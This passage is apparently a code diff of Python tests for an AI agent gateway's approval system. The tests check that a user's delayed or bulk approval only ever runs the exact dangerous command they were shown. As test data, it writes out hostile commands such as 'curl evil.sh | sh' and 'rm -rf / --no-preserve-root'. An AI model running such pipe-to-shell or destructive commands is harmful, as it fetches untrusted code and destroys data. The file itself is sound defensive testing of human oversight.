+            session_key="sess-1", chat_id="!room:example.org", message_id="$target",
+            approval_id="ab" * 16,
+        )
+        adapter._approval_prompt_by_session["sess-1"] = "$target"
+
+        content = {"m.relates_to": {"event_id": "$target", "key": "✅"}}
+        event = types.SimpleNamespace(
+            sender="@liizfq:liizfq.top",
+            event_id="$react1",
+            room_id="!room:example.org",
+            content=content,
+        )
+
+        with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
+            await adapter._on_reaction(event)
+
+        # The reaction is bound to the exact request the prompt showed.
+        mock_resolve.assert_called_once_with(
+            "sess-1", "once", expected_approval_id="ab" * 16
+        )
+        assert "$target" not in adapter._approval_prompts_by_event
+        assert "sess-1" not in adapter._approval_prompt_by_session
+
+    @pytest.mark.asyncio
+    async def test_legacy_prompt_without_id_resolves_unbound(self, monkeypatch):
+        monkeypatch.setenv("MATRIX_ALLOWED_USERS", "@liizfq:liizfq.top")
+        from plugins.platforms.matrix.adapter import MatrixAdapter, _MatrixApprovalPrompt
+
+        adapter = MatrixAdapter(PlatformConfig(enabled=True, token="tok", extra={"homeserver": "https://matrix.example.org"}))
+        adapter._user_id = "@bot:example.org"
+        adapter._approval_prompts_by_event["$target"] = _MatrixApprovalPrompt(
             session_key="sess-1", chat_id="!room:example.org", message_id="$target"
         )
         adapter._approval_prompt_by_session["sess-1"] = "$target"
@@ -33,6 +64,6 @@ class TestMatrixExecApprovalReactions:
         with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
             await adapter._on_reaction(event)
 
-        mock_resolve.assert_called_once_with("sess-1", "once")
-        assert "$target" not in adapter._approval_prompts_by_event
-        assert "sess-1" not in adapter._approval_prompt_by_session
+        mock_resolve.assert_called_once_with(
+            "sess-1", "once", expected_approval_id=None
+        )

--- a/tests/gateway/test_pending_approval_recovery.py
+++ b/tests/gateway/test_pending_approval_recovery.py
@@ -1,0 +1,483 @@
+"""Pending dangerous-approval recovery in the active busy-session path.
+
+Production shape of the failure (#27352 family): the agent thread is parked
+inside tools/approval.py waiting for /approve, the interactive UI for the
+prompt is dead (Discord buttons expire after minutes) or the user simply
+types ordinary text.  None of the busy paths (queue/steer/interrupt) can run
+until the approval resolves, so the reply used to be silently wedged behind
+the parked turn until the approval timed out and auto-denied.
+
+Contract under test:
+
+  1. Ordinary text while an approval is blocking → the gateway RE-PRESENTS
+     the exact pending request (redacted command + how to answer) instead of
+     silently queueing/steering, and records that request as the one the
+     user is now looking at.
+  2. A later explicit approve resolves exactly that request.  If it is gone
+     or superseded by the time the approve arrives, NOTHING executes and the
+     now-pending request is re-presented instead (timeout is never consent).
+  3. Recognized approve/deny words, slash commands, photos, and sessions
+     with no blocking approval keep their existing behavior.
+"""
+
+import asyncio
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, MagicMock
+
+import pytest
+
+from gateway.config import GatewayConfig, Platform, PlatformConfig
+from gateway.platforms.base import MessageEvent, MessageType
+from gateway.session import SessionSource
+
+
+def _make_source() -> SessionSource:
+    return SessionSource(
+        platform=Platform.TELEGRAM,
+        user_id="u1",
+        chat_id="c1",
+        user_name="tester",
+        chat_type="dm",
+    )
+
+
+def _make_event(text: str, message_type=MessageType.TEXT) -> MessageEvent:
+    return MessageEvent(
+        text=text,
+        message_type=message_type,
+        source=_make_source(),
+        message_id="m1",
+    )
+
+
+def _clear_approval_state():
+    from tools import approval as mod
+
+    mod._gateway_queues.clear()
+    mod._gateway_notify_cbs.clear()
+    mod._session_approved.clear()
+    mod._permanent_approved.clear()
+    mod._pending.clear()
+    mod._advertised_approvals.clear()
+
+
+def _make_runner():
+    """Minimal GatewayRunner exercising the real busy-session handler."""
+    from gateway.run import GatewayRunner
+
+    runner = object.__new__(GatewayRunner)
+    runner.config = GatewayConfig(
+        platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="***")}
+    )
+    adapter = MagicMock()
+    adapter.send = AsyncMock()
+    adapter._send_with_retry = AsyncMock(
+        return_value=SimpleNamespace(success=True, message_id="reply1")
+    )
+    adapter._unwrap_ephemeral = lambda r: (r, 0) if isinstance(r, str) else (None, 0)
+    adapter._pending_messages = {}
+    adapter.typed_command_prefix = "/"
+    runner.adapters = {Platform.TELEGRAM: adapter}
+    runner._running_agents = {}
+    runner._running_agents_ts = {}
+    runner._pending_messages = {}
+    runner._pending_approvals = {}
+    runner._busy_ack_ts = {}
+    runner._draining = False
+    runner.session_store = None
+    runner._is_user_authorized = lambda _source: True
+    runner._busy_input_mode = "interrupt"
+    runner._busy_text_mode = "interrupt"
+    return runner, adapter
+
+
+def _register_blocking_approval(runner, command="rm -rf /tmp/test",
+                                description="recursive delete"):
+    from tools.approval import _ApprovalEntry, _gateway_queues
+
+    source = _make_source()
+    session_key = runner._session_key_for_source(source)
+    entry = _ApprovalEntry({"command": command, "description": description})
+    _gateway_queues.setdefault(session_key, []).append(entry)
+    return session_key, entry
+
+
+def _sent_texts(adapter):
+    return [
+        str(call.kwargs.get("content", ""))
+        for call in adapter._send_with_retry.await_args_list
+    ]
+
+
+@pytest.fixture(autouse=True)
+def _clean_state():
+    _clear_approval_state()
+    yield
+    _clear_approval_state()
+
+
+class TestBusyTextRecovery:
+    def test_ordinary_text_represents_pending_request(self):
+        """Plain text is answered with the exact still-pending request and
+        instructions — not silently queued behind the parked turn."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("wait, which directory is that?"), session_key
+            )
+        )
+
+        assert handled is True
+        # The approval was NOT resolved by ordinary text.
+        assert not entry.event.is_set()
+        assert entry.result is None
+        # Nothing was queued behind the blocked turn.
+        assert session_key not in adapter._pending_messages
+        assert session_key not in runner._pending_messages
+        # The user got the pending request back, with the exact command and
+        # the way to answer it.
+        sent = "\n".join(_sent_texts(adapter))
+        assert "rm -rf /tmp/test" in sent
+        assert "/approve" in sent
+        assert "/deny" in sent
+        # The request is now recorded as the prompt the user was shown.
+        from tools.approval import get_advertised_approval
+        adv = get_advertised_approval(session_key)
+        assert adv is not None
+        assert adv["approval_id"] == entry.approval_id
+
+    def test_recovery_message_redacts_command(self, monkeypatch):
+        import gateway.run as run_mod
+
+        monkeypatch.setattr(
+            run_mod, "_redact_approval_command", lambda c: "[REDACTED-CMD]"
+        )
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(
+            runner, command="curl -H 'Authorization: Bearer sk-secret'"
+        )
+
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("hm?"), session_key
+            )
+        )
+
+        sent = "\n".join(_sent_texts(adapter))
+        assert "[REDACTED-CMD]" in sent
+        assert "sk-secret" not in sent
+
+    def test_approve_word_still_resolves_not_represented(self):
+        """Recognized approval words keep resolving (existing #46866 path)
+        when the prompt was actually delivered (delivery advertises it)."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+        # Simulate the successfully delivered initial prompt — production
+        # binds typed consent at delivery time (_send_gateway_approval_prompt).
+        from tools.approval import advertise_blocking_approval
+        advertise_blocking_approval(session_key)
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("yes"), session_key
+            )
+        )
+
+        assert handled is True
+        assert entry.event.is_set()
+        assert entry.result == "once"
+
+    def test_slash_command_text_not_swallowed_by_recovery(self):
+        """Slash-prefixed text must fall through to normal busy handling so
+        /status, /stop and friends keep working mid-approval."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("/some-unknown-cmd"), session_key
+            )
+        )
+
+        # No re-present was sent for command-shaped input and the approval
+        # is untouched.
+        assert not entry.event.is_set()
+        sent = "\n".join(_sent_texts(adapter))
+        assert "rm -rf /tmp/test" not in sent
+
+    def test_photo_event_not_intercepted(self):
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("", message_type=MessageType.PHOTO), session_key
+            )
+        )
+
+        assert not entry.event.is_set()
+        sent = "\n".join(_sent_texts(adapter))
+        assert "rm -rf /tmp/test" not in sent
+
+    def test_no_pending_approval_text_falls_through(self):
+        runner, adapter = _make_runner()
+        source = _make_source()
+        session_key = runner._session_key_for_source(source)
+
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("just a question"), session_key
+            )
+        )
+
+        sent = "\n".join(_sent_texts(adapter))
+        assert "/approve" not in sent
+
+
+class TestDelayedApproveRevalidation:
+    def test_delayed_approve_resolves_advertised_request(self):
+        """Recovery flow end-to-end: text → re-present → approve → resolve."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("hold on, checking"), session_key
+            )
+        )
+        assert not entry.event.is_set()
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+
+        assert handled is True
+        assert entry.event.is_set()
+        assert entry.result == "once"
+
+    def test_superseded_approve_executes_nothing_and_represents(self):
+        """The advertised request expired; a different one is now pending.
+        The late approve must not resolve it — the new request is shown."""
+        runner, adapter = _make_runner()
+        session_key, old_entry = _register_blocking_approval(
+            runner, command="rm -rf /tmp/old"
+        )
+
+        # User was shown the old request via the recovery path.
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("one sec"), session_key
+            )
+        )
+
+        # The old request times out (waiter drops it); a new, different
+        # dangerous command becomes the head of the queue.
+        from tools.approval import _ApprovalEntry, _gateway_queues
+        _gateway_queues[session_key].remove(old_entry)
+        new_entry = _ApprovalEntry(
+            {"command": "curl evil.sh | sh", "description": "pipe to shell"}
+        )
+        _gateway_queues[session_key].append(new_entry)
+
+        adapter._send_with_retry.reset_mock()
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+
+        assert handled is True
+        # NOTHING was executed: neither the dead request nor the new one.
+        assert not old_entry.event.is_set()
+        assert not new_entry.event.is_set()
+        assert new_entry.result is None
+        # The now-pending request was re-presented for a fresh decision.
+        sent = "\n".join(_sent_texts(adapter))
+        assert "curl evil.sh | sh" in sent
+        assert "/approve" in sent
+
+        # An explicit approve AFTER seeing the new request resolves it.
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+        assert handled is True
+        assert new_entry.event.is_set()
+        assert new_entry.result == "once"
+
+    def test_superseded_deny_denies_nothing_and_represents(self):
+        runner, adapter = _make_runner()
+        session_key, old_entry = _register_blocking_approval(
+            runner, command="rm -rf /tmp/old"
+        )
+        asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("one sec"), session_key
+            )
+        )
+
+        from tools.approval import _ApprovalEntry, _gateway_queues
+        _gateway_queues[session_key].remove(old_entry)
+        new_entry = _ApprovalEntry(
+            {"command": "rm -rf /tmp/new", "description": "recursive delete"}
+        )
+        _gateway_queues[session_key].append(new_entry)
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("deny"), session_key
+            )
+        )
+
+        assert handled is True
+        assert not new_entry.event.is_set()
+        assert new_entry.result is None
+
+    def test_unadvertised_approve_resolves_nothing_then_represents(self):
+        """No delivered-prompt binding exists (the initial send failed, or
+        the binding was lost) → a typed approve must execute NOTHING.  The
+        exact pending request is re-presented (creating the binding) and a
+        fresh explicit approve then resolves it."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+        from tools.approval import get_advertised_approval
+        assert get_advertised_approval(session_key) is None
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+
+        assert handled is True
+        # Blind consent refused: nothing executed.
+        assert not entry.event.is_set()
+        assert entry.result is None
+        # The exact request was re-presented and is now the binding.
+        sent = "\n".join(_sent_texts(adapter))
+        assert "rm -rf /tmp/test" in sent
+        assert "/approve" in sent
+        adv = get_advertised_approval(session_key)
+        assert adv is not None
+        assert adv["approval_id"] == entry.approval_id
+
+        # Fresh explicit approve resolves exactly the shown request.
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+        assert handled is True
+        assert entry.event.is_set()
+        assert entry.result == "once"
+
+    def test_unadvertised_deny_denies_nothing_then_represents(self):
+        """Identity semantics are symmetric: an unbound deny also refuses
+        and re-presents (denying an unseen request could kill a command the
+        user wants)."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("deny"), session_key
+            )
+        )
+
+        assert handled is True
+        assert not entry.event.is_set()
+        assert entry.result is None
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("deny"), session_key
+            )
+        )
+        assert handled is True
+        assert entry.event.is_set()
+        assert entry.result == "deny"
+
+    def test_stale_approve_after_binding_lost_cannot_execute(self):
+        """Even if an attacker-ish race clears the advertisement (e.g. the
+        advertised entry resolved elsewhere and a NEW request replaced it),
+        a typed approve can never blind-execute the newcomer."""
+        runner, adapter = _make_runner()
+        session_key, entry = _register_blocking_approval(runner)
+        from tools.approval import (
+            _ApprovalEntry,
+            _gateway_queues,
+            advertise_blocking_approval,
+            resolve_gateway_approval,
+        )
+        advertise_blocking_approval(session_key)
+        # The advertised entry resolves via its own button; the
+        # advertisement is consumed with it.
+        assert resolve_gateway_approval(session_key, "once") == 1
+        newcomer = _ApprovalEntry({"command": "curl evil | sh"})
+        _gateway_queues.setdefault(session_key, []).append(newcomer)
+
+        handled = asyncio.run(
+            runner._handle_active_session_busy_message(
+                _make_event("approve"), session_key
+            )
+        )
+
+        assert handled is True
+        assert not newcomer.event.is_set()
+        assert newcomer.result is None
+
+
+class TestBulkRecoveryRefusal:
+    """A single advertised head can never authorize the whole queue."""
+
+    def _two_pending(self, runner):
+        from tools.approval import (
+            _ApprovalEntry,
+            _gateway_queues,
+            advertise_blocking_approval,
+        )
+
+        session_key, first = _register_blocking_approval(
+            runner, command="rm -rf /tmp/first"
+        )
+        second = _ApprovalEntry(
+            {"command": "rm -rf /tmp/second", "description": "recursive delete"}
+        )
+        _gateway_queues[session_key].append(second)
+        advertise_blocking_approval(session_key)
+        return session_key, first, second
+
+    def test_advertised_approve_all_refused_with_multiple_pending(self):
+        runner, adapter = _make_runner()
+        session_key, first, second = self._two_pending(runner)
+
+        reply = asyncio.run(
+            runner._handle_approve_command(_make_event("/approve all"))
+        )
+
+        # Zero resolutions — including approvals queued after the user saw
+        # the head prompt.
+        assert not first.event.is_set()
+        assert not second.event.is_set()
+        # The exact head is re-presented with one-at-a-time instructions.
+        assert isinstance(reply, str)
+        assert "rm -rf /tmp/first" in reply
+        assert "one at a time" in reply.lower()
+
+        # A following plain /approve resolves exactly the shown head.
+        reply2 = asyncio.run(
+            runner._handle_approve_command(_make_event("/approve"))
+        )
+        assert first.event.is_set()
+        assert first.result == "once"
+        assert not second.event.is_set()
+        assert second.result is None
+
+    # Deny-all refusal and bulk-of-one degradation are covered at the
+    # handler level in test_approve_deny_commands.py; the approve variant
+    # above pins the shared refusal reply (exact head + one-at-a-time).

--- a/tests/gateway/test_plaintext_approval_routing.py
+++ b/tests/gateway/test_plaintext_approval_routing.py
@@ -49,6 +49,7 @@ def _clear_approval_state():
     mod._session_approved.clear()
     mod._permanent_approved.clear()
     mod._pending.clear()
+    mod._advertised_approvals.clear()
 
 
 def _make_runner():
@@ -83,12 +84,23 @@ def _make_runner():
 
 
 def _register_blocking_approval(runner):
-    """Register a real blocking approval entry for the runner's session."""
-    from tools.approval import _ApprovalEntry, _gateway_queues
+    """Register a real blocking approval entry for the runner's session.
+
+    Also advertises it, simulating the successfully DELIVERED initial
+    prompt: production binds typed consent at delivery time
+    (gateway.run._send_gateway_approval_prompt), and an unbound approve is
+    refused fail-safe.
+    """
+    from tools.approval import (
+        _ApprovalEntry,
+        _gateway_queues,
+        advertise_blocking_approval,
+    )
     source = _make_source()
     session_key = runner._session_key_for_source(source)
     entry = _ApprovalEntry({"command": "rm -rf /tmp/test"})
     _gateway_queues.setdefault(session_key, []).append(entry)
+    advertise_blocking_approval(session_key)
     return session_key, entry
 
 

--- a/tests/gateway/test_qqbot.py
+++ b/tests/gateway/test_qqbot.py
@@ -856,8 +856,11 @@ class TestDefaultInteractionDispatch:
 
         resolve_calls = []
 
-        def fake_resolve(session_key, choice, resolve_all=False):
-            resolve_calls.append((session_key, choice, resolve_all))
+        def fake_resolve(session_key, choice, resolve_all=False,
+                         expected_approval_id=None):
+            resolve_calls.append(
+                (session_key, choice, resolve_all, expected_approval_id)
+            )
             return 1
 
         # Patch the *module-level* function that _default_interaction_dispatch
@@ -877,7 +880,45 @@ class TestDefaultInteractionDispatch:
         finally:
             tools.approval.resolve_gateway_approval = orig
 
-        assert resolve_calls == [("agent:main:qqbot:c2c:u-42", "once", False)]
+        # Legacy button_data (no packed approval_id) → unbound FIFO resolve.
+        assert resolve_calls == [("agent:main:qqbot:c2c:u-42", "once", False, None)]
+
+    @pytest.mark.asyncio
+    async def test_approval_click_passes_packed_approval_id(self):
+        """button_data packed by encode_approval_callback_value binds the
+        click to the exact request the prompt showed."""
+        adapter = self._make_adapter()
+
+        resolve_calls = []
+
+        def fake_resolve(session_key, choice, resolve_all=False,
+                         expected_approval_id=None):
+            resolve_calls.append(
+                (session_key, choice, resolve_all, expected_approval_id)
+            )
+            return 1
+
+        approval_id = "ab" * 16  # 32-hex uuid shape
+        import tools.approval
+        orig = tools.approval.resolve_gateway_approval
+        tools.approval.resolve_gateway_approval = fake_resolve
+        try:
+            from gateway.platforms.qqbot.keyboards import parse_interaction_event
+            event = parse_interaction_event({
+                "id": "i",
+                "chat_type": 2,
+                "user_openid": "u-42",
+                "data": {"resolved": {"button_data": (
+                    f"approve:agent:main:qqbot:c2c:u-42|{approval_id}:allow-once"
+                )}},
+            })
+            await adapter._default_interaction_dispatch(event)
+        finally:
+            tools.approval.resolve_gateway_approval = orig
+
+        assert resolve_calls == [
+            ("agent:main:qqbot:c2c:u-42", "once", False, approval_id)
+        ]
 
 
     @pytest.mark.asyncio

--- a/tests/gateway/test_whatsapp_cloud.py
+++ b/tests/gateway/test_whatsapp_cloud.py
@@ -979,6 +979,7 @@ class TestSendExecApprovalButtons:
             command="rm -rf /tmp/foo",
             session_key="sess-app-1",
             description="cleanup script",
+            approval_id="ab" * 16,
         )
 
         assert result.success
@@ -992,12 +993,15 @@ class TestSendExecApprovalButtons:
         deny_id = buttons[1]["reply"]["id"]
         assert approve_id.startswith("appr:") and approve_id.endswith(":approve")
         assert deny_id.startswith("appr:") and deny_id.endswith(":deny")
-        approval_id = approve_id.split(":")[1]
-        assert deny_id.split(":")[1] == approval_id
+        callback_ref = approve_id.split(":")[1]
+        assert deny_id.split(":")[1] == callback_ref
         body = payload["interactive"]["body"]["text"]
         assert "rm -rf /tmp/foo" in body
         assert "cleanup script" in body
-        assert adapter._exec_approval_state[approval_id] == "sess-app-1"
+        # State carries both the session and the gateway request identity.
+        assert adapter._exec_approval_state[callback_ref] == (
+            "sess-app-1", "ab" * 16,
+        )
 
 
 class TestSendSlashConfirmButtons:
@@ -1098,7 +1102,7 @@ class TestDispatchInteractiveReplyApproval:
     @pytest.mark.asyncio
     async def test_approve_tap_calls_resolver_and_confirms(self, monkeypatch):
         adapter = _make_adapter()
-        adapter._exec_approval_state["app1"] = "sess-app-1"
+        adapter._exec_approval_state["app1"] = ("sess-app-1", "ab" * 16)
         adapter._http_client = MagicMock()
         adapter._http_client.post = AsyncMock(
             return_value=_mock_httpx_response(200, {"messages": [{"id": "x"}]})
@@ -1107,7 +1111,8 @@ class TestDispatchInteractiveReplyApproval:
         calls = []
         monkeypatch.setattr(
             "tools.approval.resolve_gateway_approval",
-            lambda session_key, choice: calls.append((session_key, choice)) or 1,
+            lambda session_key, choice, expected_approval_id=None:
+                calls.append((session_key, choice, expected_approval_id)) or 1,
         )
 
         raw = {
@@ -1121,11 +1126,42 @@ class TestDispatchInteractiveReplyApproval:
         handled = await adapter._dispatch_interactive_reply(raw, {})
 
         assert handled is True
-        assert calls == [("sess-app-1", "approve")]
+        # The tap is bound to the exact request the prompt showed.
+        assert calls == [("sess-app-1", "approve", "ab" * 16)]
         assert "app1" not in adapter._exec_approval_state
         confirm_payload = adapter._http_client.post.call_args.kwargs["json"]
         assert confirm_payload["type"] == "text"
         assert "Approved" in confirm_payload["text"]["body"]
+
+    @pytest.mark.asyncio
+    async def test_legacy_state_tap_resolves_unbound(self, monkeypatch):
+        """A pre-identity state entry (bare session_key) keeps working."""
+        adapter = _make_adapter()
+        adapter._exec_approval_state["app1"] = "sess-app-1"
+        adapter._http_client = MagicMock()
+        adapter._http_client.post = AsyncMock(
+            return_value=_mock_httpx_response(200, {"messages": [{"id": "x"}]})
+        )
+
+        calls = []
+        monkeypatch.setattr(
+            "tools.approval.resolve_gateway_approval",
+            lambda session_key, choice, expected_approval_id=None:
+                calls.append((session_key, choice, expected_approval_id)) or 1,
+        )
+
+        raw = {
+            "from": "15551234567",
+            "type": "interactive",
+            "interactive": {
+                "type": "button_reply",
+                "button_reply": {"id": "appr:app1:approve", "title": "Approve"},
+            },
+        }
+        handled = await adapter._dispatch_interactive_reply(raw, {})
+
+        assert handled is True
+        assert calls == [("sess-app-1", "approve", None)]
 
 
 @pytest.mark.usefixtures("authorized_interactive_env")
@@ -1182,7 +1218,7 @@ class TestDispatchInteractiveReplyAuthorization:
             _dm_policy="allowlist",
             _allow_from={"15551234567"},
         )
-        adapter._exec_approval_state["app1"] = "sess-app-1"
+        adapter._exec_approval_state["app1"] = ("sess-app-1", "ab" * 16)
         adapter._http_client = MagicMock()
         adapter._http_client.post = AsyncMock(
             return_value=_mock_httpx_response(200, {"messages": [{"id": "x"}]})
@@ -1190,7 +1226,8 @@ class TestDispatchInteractiveReplyAuthorization:
         calls = []
         monkeypatch.setattr(
             "tools.approval.resolve_gateway_approval",
-            lambda session_key, choice: calls.append((session_key, choice)) or 1,
+            lambda session_key, choice, expected_approval_id=None:
+                calls.append((session_key, choice, expected_approval_id)) or 1,
         )
 
         raw = {
@@ -1204,7 +1241,7 @@ class TestDispatchInteractiveReplyAuthorization:
         handled = await adapter._dispatch_interactive_reply(raw, {})
 
         assert handled is True
-        assert calls == [("sess-app-1", "approve")]
+        assert calls == [("sess-app-1", "approve", "ab" * 16)]
 
 
 @pytest.mark.usefixtures("authorized_interactive_env")

--- a/tests/tools/test_approval_identity.py
+++ b/tests/tools/test_approval_identity.py
@@ -1,0 +1,502 @@
+"""Approval request identity + delayed-consent revalidation (tools/approval.py).
+
+A gateway approval prompt can outlive its UI (Discord buttons expire after
+minutes while ``approvals.timeout`` can be much longer, or the prompt send
+can fail silently).  When the user's explicit approve/deny arrives *later*,
+it must resolve only the exact request they were shown — never whatever
+happens to be at the head of the queue by then.
+
+These tests cover the module-level building blocks:
+
+  * every ``_ApprovalEntry`` carries a stable ``approval_id``,
+  * ``peek_blocking_approval`` snapshots the head request,
+  * ``advertise_blocking_approval`` records "this is the request the user
+    was just shown",
+  * ``resolve_gateway_approval(..., expected_approval_id=...)`` revalidates
+    that identity atomically immediately before resolution and refuses to
+    resolve a superseded/changed request,
+  * session cleanup drops the advertisement.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+
+def _clear_approval_state():
+    from tools import approval as mod
+
+    mod._gateway_queues.clear()
+    mod._gateway_notify_cbs.clear()
+    mod._session_approved.clear()
+    mod._permanent_approved.clear()
+    mod._pending.clear()
+    mod._advertised_approvals.clear()
+
+
+def _enqueue(session_key: str, command: str, description: str = "dangerous"):
+    from tools.approval import _ApprovalEntry, _gateway_queues
+
+    entry = _ApprovalEntry({"command": command, "description": description})
+    _gateway_queues.setdefault(session_key, []).append(entry)
+    return entry
+
+
+@pytest.fixture(autouse=True)
+def _clean_state():
+    _clear_approval_state()
+    yield
+    _clear_approval_state()
+
+
+class TestApprovalIdentity:
+    def test_entries_carry_unique_ids(self):
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+        assert a.approval_id and b.approval_id
+        assert a.approval_id != b.approval_id
+
+    def test_approval_id_injected_into_notify_data(self):
+        """Notify callbacks (button UIs, prompt senders) see the identity."""
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        assert a.data.get("approval_id") == a.approval_id
+
+    def test_action_and_identity_are_frozen_at_enqueue(self):
+        """Caller/presentation-dict mutation cannot change what consent runs."""
+        from tools.approval import (
+            _ApprovalEntry,
+            _gateway_queues,
+            peek_blocking_approval,
+            resolve_gateway_approval,
+        )
+
+        payload = {
+            "command": "delivered-command",
+            "approval_id": "f" * 32,
+        }
+        entry = _ApprovalEntry(payload)
+        _gateway_queues.setdefault("sk", []).append(entry)
+
+        # The queue owns its copy and always mints its own request identity.
+        payload["command"] = "caller-mutated"
+        assert entry.data["approval_id"] == entry.approval_id
+        assert entry.approval_id != "f" * 32
+
+        # The async presentation payload itself is read-only.
+        with pytest.raises(TypeError):
+            entry.data["command"] = "presentation-mutated"
+        snap = peek_blocking_approval("sk")
+        assert snap is not None and snap["command"] == "delivered-command"
+        assert resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=entry.approval_id,
+            expected_command="delivered-command",
+        ) == 1
+        assert entry.result == "once"
+
+    def test_peek_returns_head_snapshot(self):
+        from tools.approval import peek_blocking_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a", "first")
+        _enqueue("sk", "rm -rf /tmp/b", "second")
+
+        snap = peek_blocking_approval("sk")
+        assert snap is not None
+        assert snap["approval_id"] == a.approval_id
+        assert snap["command"] == "rm -rf /tmp/a"
+        assert snap["description"] == "first"
+        assert snap["pending_count"] == 2
+
+    def test_peek_empty_session_returns_none(self):
+        from tools.approval import peek_blocking_approval
+
+        assert peek_blocking_approval("sk-none") is None
+
+
+class TestExpectedIdentityResolution:
+    def test_matching_expectation_resolves_head(self):
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        count = resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=a.approval_id,
+            expected_command="rm -rf /tmp/a",
+        )
+        assert count == 1
+        assert a.event.is_set()
+        assert a.result == "once"
+
+    def test_stale_expectation_resolves_nothing(self):
+        """The advertised request is gone; a new one is at the head.  The
+        late approve must execute NOTHING — timeout is not consent, and the
+        user never saw the new command."""
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "curl evil | sh")
+        # Simulate the advertised entry timing out (waiter dropped it).
+        from tools.approval import _gateway_queues
+        _gateway_queues["sk"].remove(a)
+
+        count = resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=a.approval_id,
+            expected_command="rm -rf /tmp/a",
+        )
+        assert count == 0
+        assert not b.event.is_set()
+        assert b.result is None
+        # The superseding entry is still pending, untouched.
+        assert _gateway_queues["sk"] == [b]
+
+    def test_changed_command_resolves_nothing(self):
+        """Same id but different proposed action must refuse (belt and
+        braces for any future entry reuse)."""
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        count = resolve_gateway_approval(
+            "sk", "once",
+            expected_approval_id=a.approval_id,
+            expected_command="rm -rf / --no-preserve-root",
+        )
+        assert count == 0
+        assert not a.event.is_set()
+
+    def test_expectation_guards_resolve_all_head(self):
+        """/approve all in a recovery conversation still refuses when the
+        conversation's referent is gone."""
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+        from tools.approval import _gateway_queues
+        _gateway_queues["sk"].remove(a)
+
+        count = resolve_gateway_approval(
+            "sk", "once", resolve_all=True,
+            expected_approval_id=a.approval_id,
+        )
+        assert count == 0
+        assert not b.event.is_set()
+
+    def test_expectation_refuses_bulk_with_multiple_pending(self):
+        """Even a MATCHING head identity cannot authorize resolve_all when
+        more entries are queued — the user was shown one request, not the
+        tail that may have arrived after they read it."""
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+
+        count = resolve_gateway_approval(
+            "sk", "once", resolve_all=True,
+            expected_approval_id=a.approval_id,
+            expected_command="rm -rf /tmp/a",
+        )
+        assert count == 0
+        assert not a.event.is_set()
+        assert not b.event.is_set()
+
+    def test_expectation_allows_bulk_of_one(self):
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        count = resolve_gateway_approval(
+            "sk", "once", resolve_all=True,
+            expected_approval_id=a.approval_id,
+        )
+        assert count == 1
+        assert a.event.is_set()
+
+    def test_no_expectation_preserves_fifo_behavior(self):
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        b = _enqueue("sk", "rm -rf /tmp/b")
+        assert resolve_gateway_approval("sk", "once") == 1
+        assert a.event.is_set()
+        assert not b.event.is_set()
+
+    def test_single_execution_second_resolve_finds_nothing(self):
+        from tools.approval import resolve_gateway_approval
+
+        a = _enqueue("sk", "rm -rf /tmp/a")
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 1
+        assert resolve_gateway_approval(
+            "sk", "once", expected_approval_id=a.approval_id
+        ) == 0
+
+    def test_already_resolved_entry_cannot_be_overwritten(self):
+        """An interrupt winner still awaiting queue cleanup cannot be changed
+        into approval by a concurrent callback."""
